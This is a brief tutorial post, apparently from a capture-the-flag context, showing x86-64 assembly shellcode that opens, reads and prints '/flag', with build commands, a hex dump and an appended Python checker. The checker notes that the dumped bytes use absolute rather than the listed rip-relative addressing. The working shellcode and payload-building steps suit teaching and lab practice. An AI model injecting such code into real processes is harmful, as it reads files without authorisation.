Best way to get your raw shellcode

Dec. 10, 2020 // echel0n

Hello fellas! If you're wondering how to compile your payload and get raw shellcode in seconds, you can try this.

  .global _start
  _start:
  .intel_syntax noprefix
  push [rip + 0x28]   # push the 8 bytes at flagstring (rip-relative: 0x28 past the next instruction)
  push rsp
  pop rdi             # rdi = pointer to "/flag" now sitting on the stack
  push 0
  pop rsi             # rsi = 0 -> O_RDONLY
  push 2
  pop rax             # rax = 2 -> syscall open(pathname, flags)
  syscall
  # read(int fd, void *buf, size_t count)
  push rax            # rax holds the fd returned by open()
  pop rdi             # rdi = fd
  push rsp
  pop rsi             # rsi = stack buffer
  push 150
  pop rdx             # rdx = 150 -> buffer length
  push 0
  pop rax             # rax = 0 -> syscall read()
  syscall
  # write(int fd, void *buf, size_t count)
  push rsp
  pop rsi             # rsi = stack buffer (rdx still holds 150 from read())
  push 1
  pop rax             # rax = 1 -> syscall write()
  push 1
  pop rdi             # rdi = 1 -> STDOUT
  syscall
  # exit()
  push 60
  pop rax             # rax = 60 -> syscall exit()
  syscall
  flagstring:
  .string "\x2f\x66\x6c\x61\x67\x00"   # "/flag\0"
  # gcc does not assemble a .asm suffix on its own, so tell it the input language
  $ gcc -x assembler -nostdlib -static shellcode.asm -o shellcode-elf
  $ objcopy --dump-section .text=shellcode-raw shellcode-elf

Congrats! You've just compiled your shellcode and copied the raw payload to the ./shellcode-raw file. Let's verify this with a hex dump.

  00000000: ff34 252f 1040 0054 5f6a 005e 6a02 580f .4%/.@.T_j.^j.X.
  00000010: 0550 5f54 5e68 9600 0000 5a6a 0058 0f05 .P_T^h....Zj.X..
  00000020: 545e 6a01 586a 015f 0f05 6a3c 580f 052f T^j.Xj._..j<X../
  00000030: 666c 6167 0000 flag..
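Eyeballing a dump only gets you so far, so here is an added check that is not part of the original post: a small Python script that parses the xxd output above back into bytes and reports the properties you usually care about before calling a blob "shellcode" (length, NUL bytes, number of syscall instructions, where the path string landed, and how the first instruction addresses it). The parser, the `analyse` report and the `as_c_array` helper are my own names, not anything from the post or its toolchain.

```python
# Added example, not from the original post: turn the xxd dump back into bytes
# and run the sanity checks I'd want on a freshly objcopy'd blob.
import re
import struct

# The hex dump shown in the post, embedded verbatim so the script runs offline.
XXD_DUMP = """\
00000000: ff34 252f 1040 0054 5f6a 005e 6a02 580f .4%/.@.T_j.^j.X.
00000010: 0550 5f54 5e68 9600 0000 5a6a 0058 0f05 .P_T^h....Zj.X..
00000020: 545e 6a01 586a 015f 0f05 6a3c 580f 052f T^j.Xj._..j<X../
00000030: 666c 6167 0000 flag..
"""

HEX_TOKEN = re.compile(r"^[0-9a-fA-F]{2,4}$")


def parse_xxd(dump: str) -> bytes:
    """Reverse an xxd dump: skip the offset, then take hex tokens (at most 8,
    i.e. 16 bytes per line) until the first token that is not 2-4 hex digits,
    which is the start of the ASCII column. Caveat: a short last line whose
    ASCII text happens to look like hex ("abcd") would be misread."""
    out = bytearray()
    for line in dump.splitlines():
        if ":" not in line:
            continue
        _, rest = line.split(":", 1)
        for tok in rest.split()[:8]:
            if not HEX_TOKEN.match(tok):
                break  # reached the ASCII column
            out += bytes.fromhex(tok)
    return bytes(out)


def first_push_addressing(code: bytes):
    """Decode only the addressing form of a leading `push qword ptr [mem]`
    (opcode FF /6). Returns ("rip-relative", disp32), ("absolute", addr) or None."""
    if code[0:2] == b"\xff\x35":            # ModRM 00 110 101 -> [rip + disp32]
        return "rip-relative", struct.unpack_from("<i", code, 2)[0]
    if code[0:3] == b"\xff\x34\x25":        # SIB with no base/index -> [disp32]
        return "absolute", struct.unpack_from("<I", code, 3)[0]
    return None


def analyse(code: bytes) -> dict:
    """Report the properties worth checking before reusing the blob elsewhere."""
    flag_off = code.find(b"/flag\x00")
    mode, value = first_push_addressing(code) or (None, None)
    report = {
        "length": len(code),
        "has_nul": b"\x00" in code,            # matters if delivery stops at NUL
        "syscalls": code.count(b"\x0f\x05"),   # number of `syscall` instructions
        "flagstring_offset": flag_off,
        "first_push": mode,
    }
    if mode == "absolute" and flag_off >= 0:
        # The linker resolved the operand to a fixed virtual address; subtracting
        # the string's offset recovers the .text base the ELF was linked at.
        report["linked_text_base"] = value - flag_off
    return report


def as_c_array(code: bytes, name: str = "shellcode") -> str:
    """Render the bytes as a C array for embedding in a test harness."""
    body = ", ".join(f"0x{b:02x}" for b in code)
    return f"unsigned char {name}[{len(code)}] = {{ {body} }};"


if __name__ == "__main__":
    code = parse_xxd(XXD_DUMP)
    for key, value in analyse(code).items():
        print(f"{key:>18}: {value}")
    print(as_c_array(code))
```

Run it and the report makes one thing visible that the dump hides in plain sight: the first instruction is `ff 34 25 2f 10 40 00`, which is `push qword ptr [0x40102f]`, an absolute address that only resolves correctly when the code sits where the static ELF was linked. The `[rip + 0x28]` form in the listing assembles to the rip-relative `ff 35` encoding instead, which is what keeps the blob position-independent, so it is worth checking which one your toolchain actually emitted. The script also confirms the blob contains NUL bytes (from `push 0`, the 32-bit immediate in `push 150`, and the terminated string), which is fine when the bytes are loaded from a file but not when they travel through a C-string copy.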

Have a nice day!